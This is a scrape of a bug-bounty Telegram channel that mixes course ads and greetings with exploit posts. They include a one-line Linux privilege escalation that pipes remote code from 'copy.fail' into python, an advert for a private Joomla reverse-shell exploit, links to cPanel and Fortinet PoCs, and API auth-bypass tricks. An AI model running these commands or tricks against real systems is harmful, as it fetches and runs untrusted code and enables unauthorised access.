Brut Security
15.6K subscribers
1.01K photos
82 videos
295 files
1.08K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!


🚨History Breaking exploit😳

CVE-2026-31431 (nickname: copy fail)

A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!!

Exploit code:
curl copy.fail/exp | python3 && su


Guys, AI is going to be very dangerous😨

Don't forget to follow me x.com/darkshadow2bd

#exploit #bugbountytips #linux
❀7πŸ”₯4πŸ‘2
Behind every secure system,
there’s someone putting in the work no one sees.

Late nights, constant learning, silent defense.

This Labour Day, we salute every ethical hacker, analyst, and learner building a safer digital world.

Respect the grind.

Happy Labour Day.

#LabourDay #CyberSecurity #EthicalHacking #BrutSecurity
❀7πŸ”₯4πŸ‘1
Wishing you peace and clarity this Buddha Purnima.
❀3
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”₯CVE-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator

🚨https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
Please open Telegram to view this post
VIEW IN TELEGRAM
1❀19
πŸ₯Ί If you found the posts helpful, drop a like on the post.

It helps us reach more people and keeps us motivated to share better content.
Please open Telegram to view this post
VIEW IN TELEGRAM
❀10πŸ”₯8
🚨 cPanelSniper β€” CVE-2026-41940

cPanel & WHM'de CVSS 10.0 kritik auth bypass.

CRLF injection β†’ session file poisoning β†’ root WHM access.

https://github.com/ynsmroztas/cPanelSniper
❀16πŸ™3
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”₯ JOOMLA PRO EXPLOIT v2026 πŸ”₯

The best private Joomla exploit injects an immediate reverse shell on all versions.

βœ… SVG upload + rename to .php (total bypass)
βœ… Automatic bypass of WAF and Cloudflare
βœ… Automatic fallback via installTemplate (remote ZIP)
βœ… 50 threads – scans 5+ directories and subpaths in seconds
βœ… Updated with newly discovered CVE-2026

πŸ“Œ Unique Feature:

Automatically detects CSRF token
Tests 15 upload directories (webroot, admin, images, tmp, etc.)

DM πŸ‘‰ @Mm_fit 🦊

πŸš€ LAST 3 SPOTS AVAILABLE!

Channel: https://t.me/cve0day

#AD
Please open Telegram to view this post
VIEW IN TELEGRAM
❀7
⚠️403 bypass tools for bug bounty hunters:

bypass-403 β†’ https://github.com/iamj0ker/bypass-403
nomore403 β†’ https://github.com/devploit/nomore403
4-ZERO-3 β†’ https://github.com/Dheerajmadhukar/4-ZERO-3
byp4xx β†’ https://github.com/lobuhi/byp4xx
dontgo403 β†’ https://github.com/mbrg/dontgo403
Please open Telegram to view this post
VIEW IN TELEGRAM
❀15πŸ‘2πŸ‘¨β€πŸ’»2
1600+ tested regex patterns for detecting secrets, API keys, passwords, and tokens

β€’ Works with TruffleHog and Gitleaks
β€’ ReDoS-safe patterns
β€’ Confidence-based categorization

Limited regex coverage = missed secrets

https://github.com/mazen160/secrets-patterns-db

#AppSec #DevSecOps #BugBounty
πŸ‘9πŸ‘2πŸ—Ώ1
⚠️A web pentesting batch started this weekend.

β˜„οΈ50% discount for this batch only!

πŸ””Starting from Saturday 1.30 PM IST

DM on WhatsApp - wa.link/brutsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2❀1
πŸ”” A PoC/exploit has been discovered for vulnerability CVE-2026-35616

PT ID: PT-2026-30288

Vendor: Fortinet
Product: FortiClientEMS
Description: A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.

Link: https://github.com/Alaatk/CVE-2026-35616
❀5
πŸ”₯πŸ‘‰Get Web Application Bug Bounty Methodology + Bug Bounty Masterclass + Ethical Hacking Study Guide at 50% Discount
https://topmate.io/saumadip/2054509?coupon_code=awxe
Please open Telegram to view this post
VIEW IN TELEGRAM
❀1
⚑️PoC collection of Atlassian(Jira, Confluence, Bitbucket) products and Jenkins, Solr, Nexus,etc

βœ…http://github.com/shadowsock5/Poc
πŸ”₯8❀6🐳2πŸ‘1
🦊 BRUT SECURITY – NEW BATCH STARTING FROM JUNE

πŸ‘ΎMaster Practical Web Pentesting & Bug Bounty Hunting from scratch to advanced level.

βœ… Real-world web attacks
βœ… Live practical sessions
βœ… Bug bounty methodology
βœ… Recon to exploitation
βœ… Report writing & workflow
βœ… Beginner friendly + advanced concepts

πŸ“… Batch Starts: June 2026
πŸ“ Online Live Classes, Weekend Batch
πŸ“© Limited seats available

πŸ”™πŸ”œDM http://wa.link/brutsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
❀5
Hey Hunter’s,
DarkShadow is here back again!

if you got any api endpoint and showing you unauthorized then use fake perameter like:

/api/public = unauthorized
/api/public/latest?anything=/api/public


you can FUZZ like:
?admin=true,
?bypass=1,
debug=true,
OR try to add header β€œX-Custom-IP-Authorization: 127.0.0.1”

these are some underrated but very effective method which i use to check api endpoints.


if you guy’s really enjoy to read such method then show your love to react here πŸ”₯❀️
πŸ”₯6❀4πŸ‘2